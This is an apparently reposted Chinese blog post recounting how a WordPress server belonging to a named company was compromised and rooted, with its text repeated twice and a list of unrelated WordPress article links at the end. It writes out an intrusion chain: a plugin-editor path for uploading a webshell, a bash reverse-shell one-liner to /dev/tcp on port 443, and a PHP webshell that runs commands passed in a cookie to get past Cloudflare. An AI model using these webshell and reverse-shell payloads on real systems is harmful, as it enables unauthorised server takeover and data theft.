如何获取OTOY服务器root权限的
2015-11-02 00:00
1111 查看
摘要: wordpress常见getshell方法,绕过插件限制上传webshell,绕过cloudflare反弹shell
0x1: 获取账户密码
注入获取帐号密码登录wordpress网站后台(略过).
0x2: 上传webshell
1.Media Uploader: wordpress新版本中很长时间都不可用.
2.Themes Editor: 没有写入权限.
3.Plugin Editor: 插件编辑无法激活
There was something called (inactive files) for Plugins files, If you tried to edit a file of the plugin, Only the plugin main file will be on active mode, all other files will be marked as Inactive mode, and If you edited the main file, The plugin will be deactivated and then you’ll not be able to see it on plugins again.
4.寻找现有插件的漏洞
0x3: 绕过插件限制上传webshell
0x4: 反弹shell
反弹被Cloudflare防火墙拦截
0x5: 绕过Cloudflare防火墙反弹shell
通过cookies来传递执行的命令请求
0x6: Done ;)
原文链接:http://pwnrules.com/otoy-server-rooted/
0x1: 获取账户密码
注入获取帐号密码登录wordpress网站后台(略过).
0x2: 上传webshell
1.Media Uploader: wordpress新版本中很长时间都不可用.
2.Themes Editor: 没有写入权限.
3.Plugin Editor: 插件编辑无法激活
There was something called (inactive files) for Plugins files, If you tried to edit a file of the plugin, Only the plugin main file will be on active mode, all other files will be marked as Inactive mode, and If you edited the main file, The plugin will be deactivated and then you’ll not be able to see it on plugins again.
4.寻找现有插件的漏洞
0x3: 绕过插件限制上传webshell
plugin-editor.php?file=index.php&plugin=index.php
0x4: 反弹shell
反弹被Cloudflare防火墙拦截
nc -l -vvv -p 443 bash -i >& /dev/tcp/$myip/443 0>&1
0x5: 绕过Cloudflare防火墙反弹shell
通过cookies来传递执行的命令请求
<?php system($_COOKIE[‘cmd’]);
Cookie: cmd=bash -i >& /dev/tcp/$myip/443 0>&1
0x6: Done ;)
原文链接:http://pwnrules.com/otoy-server-rooted/
相关文章推荐
- wordpress rewrite问题解决
- WordPress升级版本及安装插件出现”Problem with the SSL CA cert”的解决办法
- 推荐十款免费 WordPress 插件
- 在Linux系统下一键重新安装WordPress的脚本示例
- Wordpress 忘记密码的处理方法
- cos-html-cache关于WordPress的静态化方法
- 关于bluehost空间上wordpress后台变为英文的解决方案
- 如何让PHPnow支持wordpress静态化链接的方法
- Wordpress ThickBox 点击图片显示下一张图的修改方法
- 将博客园(cnblogs.com)数据导入到wordpress的代码
- 完美实现wordpress禁止文章修订和自动保存的方法
- WordPress中is_singular()函数简介
- 使用wordpress的$wpdb类读mysql数据库做ajax时出现的问题该如何解决
- Wordpress php 分页代码
- WordPress中"无法将上传的文件移动至"错误的解决方法
- 在SAE上搭建最新wordpress的方法
- VPS中使用LNMP安装WordPress教程
- PHP+Memcache实现wordpress访问总数统计(非插件)
- PHP实现清除wordpress里恶意代码
- 再Docker中架设完整的WordPress站点全攻略